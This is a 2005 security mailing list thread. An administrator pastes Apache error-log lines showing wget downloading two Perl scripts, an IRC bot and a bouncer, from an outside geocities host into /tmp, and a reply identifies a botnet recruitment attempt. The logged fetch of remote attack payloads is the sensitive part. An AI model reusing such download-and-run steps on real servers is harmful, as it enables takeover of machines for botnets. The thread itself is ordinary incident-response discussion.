Security Basics mailing list archives
Re: Strange found in apache error.log
From: "Security" <security () yakboy org>
Date: Mon, 5 Dec 2005 18:07:03 -0000
BNC is a bouncer for connecting to IRC with ... and the bot9 is probably a bot script for the above ... looks like someone tried to set your system into a drone for a botnet.----- Original Message ----- From: <kc () mikrobit pl>
To: <security-basics () securityfocus com> Sent: Sunday, December 04, 2005 12:39 AM Subject: Strange found in apache error.log Hi I found something like this in my apapche error.log [Sat Dec 03 00:16:18 2005] [error] an unknown filter was not added: includes [Sat Dec 03 00:16:18 2005] [error] an unknown filter was not added: includes [Sat Dec 03 00:16:18 2005] [error] an unknown filter was not added: includes[Sat Dec 03 00:32:30 2005] [error] [client 218.156.221.22] client denied by server configuration: /v
irtual/mikrobit/_http/[Sat Dec 03 00:34:10 2005] [error] [client 81.219.172.109] client denied by server configuration: /v
irtual/mikrobit/_http/ --00:42:14-- http://www.geocities.com/ikanlagasiam/bot9.txt => `bot9.txt' Resolving www.geocities.com... 66.218.77.68 Connecting to www.geocities.com|66.218.77.68|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 19,552 (19K) [text/plain] 0K .......... ......... 100% 46.0K 00:42:15 (45.94 KB/s) - `bot9.txt' saved [19552/19552] --00:42:15-- http://www.geocities.com/ikanlagasiam/bnc.txt => `bnc.txt' Resolving www.geocities.com... 66.218.77.68 Connecting to www.geocities.com|66.218.77.68|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 21,090 (21K) [text/plain] 0K .......... .......... 100% 48.8K 00:42:16 (48.78 KB/s) - `bnc.txt' saved [21090/21090] --00:42:16-- http://bot9.txt.*/ => `index.html' Resolving bot9.txt.*... failed: Unknown host. And when I look in /tmp I found those 2 perl scripts: bot9.txt and bnc.txt After that I look here #ps ax and I found 2 alien proccesses .. How could they get and run that scripts ?? I use Apache: 2.0.54-r7 mod_php: 4.4.0-r1 OS: gentoo 2005.1
Current thread:
- Strange found in apache error.log kc (Dec 05)
- Re: Strange found in apache error.log ascii (Dec 05)
- Re: Strange found in apache error.log Security (Dec 05)
- Re: Strange found in apache error.log Gaddis, Jeremy L. (Dec 06)
- Root kits and host.deny Frynge.com Support (Dec 08)
- Re: Root kits and host.deny Scott B (Dec 08)
- Re: Root kits and host.deny Jeff Davis (Dec 08)
- Re: Root kits and host.deny Edward Krack (Dec 12)
- Re: Root kits and host.deny Gaddis, Jeremy L. (Dec 12)
- Message not available
- Re: Root kits and host.deny Gaddis, Jeremy L. (Dec 13)
- <Possible follow-ups>
- Re: Strange found in apache error.log arron (Dec 05)
- RE: Strange found in apache error.log Miguel Dilaj (Dec 06)